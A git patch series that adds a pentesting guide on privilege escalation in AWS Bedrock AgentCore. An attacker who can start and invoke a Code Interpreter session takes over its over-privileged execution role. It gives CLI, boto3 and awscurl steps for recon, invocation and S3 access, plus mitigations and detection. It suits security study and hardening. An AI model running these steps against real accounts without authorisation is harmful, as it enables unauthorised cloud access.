From 70738d211e8ef9a1425394d7bd579ba4e7dc9cd2 Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 00:06:33 +0100 Subject: [PATCH 1/3] Revise AWS Bedrock AgentCore Code Interpreter documentation Updated the AWS Bedrock AgentCore documentation to clarify the Code Interpreter Role Pivot technique, including details on preconditions, required IAM actions, exploitation flow, and mitigation strategies. --- .../aws-bedrock-agentcore-privesc.md | 88 +++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md new file mode 100644 index 000000000..3f523b975 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md @@ -0,0 +1,88 @@ +# AWS Bedrock AgentCore - Code Interpreter Role Pivot + +## Service + +**Amazon Bedrock AgentCore** + +## Technique Name + +**Code Interpreter Role Pivot** (Privilege escalation/lateral movement via over-privileged `executionRoleArn`) + +## Why this Matters + +Amazon Bedrock AgentCore introduced a "Code Interpreter" feature in mid-2025 that acts as a managed compute surface. It executes code within a Firecracker MicroVM-isolated environment. The critical security hook is the **`executionRoleArn`**: this is the IAM identity the interpreter uses to interact with other AWS services. + +When a developer grants this service-linked role excessive permissions (e.g., `s3:*`, `secretsmanager:GetSecretValue`), any user with the ability to invoke the interpreter can effectively "hijack" those permissions to move laterally or escalate privileges within the account. + + +## Preconditions (The Misconfiguration) + +1. **Over-privileged Execution Role:** An AgentCore Code Interpreter is configured with a role that has access to sensitive data or administrative APIs. +2. **Broad Invocation Access:** A low-privileged IAM principal is granted permission to start or interact with these sessions. +3. **Governance Failure:** The environment is treated as "AI experimental tooling" rather than "Managed Compute," bypassing standard Least Privilege reviews. + + +## Required IAM Actions + +To execute this pivot, an attacker needs one or more of the following `bedrock-agentcore` actions: + +* `bedrock-agentcore:StartCodeInterpreterSession` +* `bedrock-agentcore:InvokeCodeInterpreter` +* `bedrock-agentcore:CreateCodeInterpreter` (Allows creating a session with a pre-existing role) + +> **Note on `iam:PassRole`:** In current AWS Service Authorization References, `CreateCodeInterpreter` does not explicitly list `iam:PassRole` as a dependency in the same way `CreateGateway` does. This creates a potential "PassRole-less" role selection edge case that should be validated in target environments. + + +## Exploitation Flow + +### 1. Reconnaissance + +Identify existing interpreters and their associated execution roles. + +```bash +aws bedrock-agentcore-control list-code-interpreters +aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id + +``` + +### 2. Session Initiation + +Start a session to gain access to the compute environment. + +```bash +aws bedrock-agentcore start-code-interpreter-session --code-interpreter-id + +``` + +### 3. Lateral Movement / Exfiltration + +Invoke the interpreter to execute Python code that uses the `executionRoleArn` credentials to access other services. + +```python +import boto3 +# The interpreter uses the executionRoleArn automatically +s3 = boto3.client('s3') +print(s3.list_buckets()) + +``` + + +## Mitigation & Detection + +### **Prevention** + +* **Apply Permission Boundaries:** Attach a boundary to the `executionRoleArn` to ensure it cannot perform IAM mutations or sensitive data deletions, regardless of its primary policy. +* **Restrict Invocation:** Limit `StartCodeInterpreterSession` and `InvokeCodeInterpreter` to specific, authorized admin principals. +* **Identity Scoping:** Use the `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` condition keys to ensure sessions are isolated to specific users. + +### **Detection** + +* **CloudTrail Monitoring:** Monitor for `StartCodeInterpreterSession` events from unexpected IPs or principals. +* **Credential Usage:** Alert on the use of AgentCore execution role credentials (detectable via the `UserAgent` or `PrincipalId` in CloudTrail) to access S3 buckets or Secrets Manager outside of normal AI operations. + + +## References + +* [AWS CLI Reference: create-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) +* [AWS Service Authorization: Bedrock AgentCore](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonbedrockagentcore.html) +* [AWS CLI: start-code-interpreter-session](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) From 9f57fc71197be234430324f5dc35db435c641e07 Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 11:04:17 +0100 Subject: [PATCH 2/3] Rename src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md --- .../README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename src/pentesting-cloud/aws-security/aws-privilege-escalation/{src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md => aws-bedrock-agentcore-privesc/README.md} (100%) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md similarity index 100% rename from src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md From 45573491412c93664bb78a52b2dda41ad5bc670e Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 18:35:30 +0100 Subject: [PATCH 3/3] docs(aws): add AgentCore Code Interpreter role pivot privesc --- .../aws-bedrock-agentcore-privesc/README.md | 88 ------------- .../aws-bedrock-privesc/README.md | 122 ++++++++++++++++++ 2 files changed, 122 insertions(+), 88 deletions(-) delete mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md deleted file mode 100644 index 3f523b975..000000000 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md +++ /dev/null @@ -1,88 +0,0 @@ -# AWS Bedrock AgentCore - Code Interpreter Role Pivot - -## Service - -**Amazon Bedrock AgentCore** - -## Technique Name - -**Code Interpreter Role Pivot** (Privilege escalation/lateral movement via over-privileged `executionRoleArn`) - -## Why this Matters - -Amazon Bedrock AgentCore introduced a "Code Interpreter" feature in mid-2025 that acts as a managed compute surface. It executes code within a Firecracker MicroVM-isolated environment. The critical security hook is the **`executionRoleArn`**: this is the IAM identity the interpreter uses to interact with other AWS services. - -When a developer grants this service-linked role excessive permissions (e.g., `s3:*`, `secretsmanager:GetSecretValue`), any user with the ability to invoke the interpreter can effectively "hijack" those permissions to move laterally or escalate privileges within the account. - - -## Preconditions (The Misconfiguration) - -1. **Over-privileged Execution Role:** An AgentCore Code Interpreter is configured with a role that has access to sensitive data or administrative APIs. -2. **Broad Invocation Access:** A low-privileged IAM principal is granted permission to start or interact with these sessions. -3. **Governance Failure:** The environment is treated as "AI experimental tooling" rather than "Managed Compute," bypassing standard Least Privilege reviews. - - -## Required IAM Actions - -To execute this pivot, an attacker needs one or more of the following `bedrock-agentcore` actions: - -* `bedrock-agentcore:StartCodeInterpreterSession` -* `bedrock-agentcore:InvokeCodeInterpreter` -* `bedrock-agentcore:CreateCodeInterpreter` (Allows creating a session with a pre-existing role) - -> **Note on `iam:PassRole`:** In current AWS Service Authorization References, `CreateCodeInterpreter` does not explicitly list `iam:PassRole` as a dependency in the same way `CreateGateway` does. This creates a potential "PassRole-less" role selection edge case that should be validated in target environments. - - -## Exploitation Flow - -### 1. Reconnaissance - -Identify existing interpreters and their associated execution roles. - -```bash -aws bedrock-agentcore-control list-code-interpreters -aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id - -``` - -### 2. Session Initiation - -Start a session to gain access to the compute environment. - -```bash -aws bedrock-agentcore start-code-interpreter-session --code-interpreter-id - -``` - -### 3. Lateral Movement / Exfiltration - -Invoke the interpreter to execute Python code that uses the `executionRoleArn` credentials to access other services. - -```python -import boto3 -# The interpreter uses the executionRoleArn automatically -s3 = boto3.client('s3') -print(s3.list_buckets()) - -``` - - -## Mitigation & Detection - -### **Prevention** - -* **Apply Permission Boundaries:** Attach a boundary to the `executionRoleArn` to ensure it cannot perform IAM mutations or sensitive data deletions, regardless of its primary policy. -* **Restrict Invocation:** Limit `StartCodeInterpreterSession` and `InvokeCodeInterpreter` to specific, authorized admin principals. -* **Identity Scoping:** Use the `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` condition keys to ensure sessions are isolated to specific users. - -### **Detection** - -* **CloudTrail Monitoring:** Monitor for `StartCodeInterpreterSession` events from unexpected IPs or principals. -* **Credential Usage:** Alert on the use of AgentCore execution role credentials (detectable via the `UserAgent` or `PrincipalId` in CloudTrail) to access S3 buckets or Secrets Manager outside of normal AI operations. - - -## References - -* [AWS CLI Reference: create-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) -* [AWS Service Authorization: Bedrock AgentCore](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonbedrockagentcore.html) -* [AWS CLI: start-code-interpreter-session](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md new file mode 100644 index 000000000..017d1323b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md @@ -0,0 +1,122 @@ +# AWS - Bedrock PrivEsc + +{{#include ../../../../banners/hacktricks-training.md}} + +## Amazon Bedrock AgentCore + +### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot + +AgentCore Code Interpreter is a managed execution environment. **Custom Code Interpreters** can be configured with an **`executionRoleArn`** that “provides permissions for the code interpreter to access AWS services”. + +If a **lower-privileged IAM principal** can **start + invoke** a Code Interpreter session that is configured with a **more privileged execution role**, the caller can effectively **pivot into the execution role’s permissions** (lateral movement / privilege escalation depending on role scope). + +> [!NOTE] +> This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access). +> AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke. + +#### Preconditions (common misconfiguration) + +- A **custom code interpreter** exists with an over-privileged **execution role** (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities). +- A user (developer/auditor/CI identity) has permissions to: + - start sessions: `bedrock-agentcore:StartCodeInterpreterSession` + - invoke tools: `bedrock-agentcore:InvokeCodeInterpreter` +- (Optional) The user can also create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (lets them create a new interpreter configured with an execution role, depending on org guardrails). + +#### Recon (identify custom interpreters and execution role usage) + +List interpreters (control-plane) and inspect their configuration: + +```bash +aws bedrock-agentcore-control list-code-interpreters +aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id +```` + +> The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have. + +#### Step 1 - Start a session (this returns a `sessionId`, not an interactive shell) + +```bash +SESSION_ID=$( + aws bedrock-agentcore start-code-interpreter-session \ + --code-interpreter-identifier \ + --name "arte-oussama" \ + --query sessionId \ + --output text +) + +echo "SessionId: $SESSION_ID" +``` + +#### Step 2 - Invoke code execution (Boto3 or signed HTTPS) + +There is **no interactive python shell** from `start-code-interpreter-session`. Execution happens via **InvokeCodeInterpreter**. + +**Option A - Boto3 example (execute Python + verify identity):** + +```python +import boto3 + +client = boto3.client("bedrock-agentcore", region_name="") + +# Execute python inside the Code Interpreter session +resp = client.invoke_code_interpreter( + codeInterpreterIdentifier="", + sessionId="", + name="executeCode", + arguments={ + "language": "python", + "code": "import boto3; print(boto3.client('sts').get_caller_identity())" + } +) + +# Response is streamed; print events for visibility +for event in resp.get("stream", []): + print(event) +``` + +If the interpreter is configured with an execution role, the `sts:GetCallerIdentity()` output should reflect that role’s identity (not the low-priv caller), demonstrating the pivot. + +**Option B - Signed HTTPS call (awscurl):** + +```bash +awscurl -X POST \ + "https://bedrock-agentcore..amazonaws.com/code-interpreters//tools/invoke" \ + -H "Content-Type: application/json" \ + -H "Accept: application/json" \ + -H "x-amzn-code-interpreter-session-id: " \ + --service bedrock-agentcore \ + --region \ + -d '{ + "name": "executeCode", + "arguments": { + "language": "python", + "code": "print(\"Hello from AgentCore\")" + } + }' +``` + +#### Impact + +* **Lateral movement** into whatever AWS access the interpreter execution role has. +* **Privilege escalation** if the interpreter execution role is more privileged than the caller. +* Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration). + +#### Mitigations / Hardening + +* **Least privilege** on the interpreter `executionRoleArn` (treat it like Lambda execution roles / CI roles). +* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) and who can start sessions. +* Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary). +* Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation. + +## References + +- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/) +- [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/) +- [AWS CLI: create-code-interpreter (`--execution-role-arn`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) +- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) +- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html) +- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html) + + +{{#include ../../../../banners/hacktricks-training.md}} +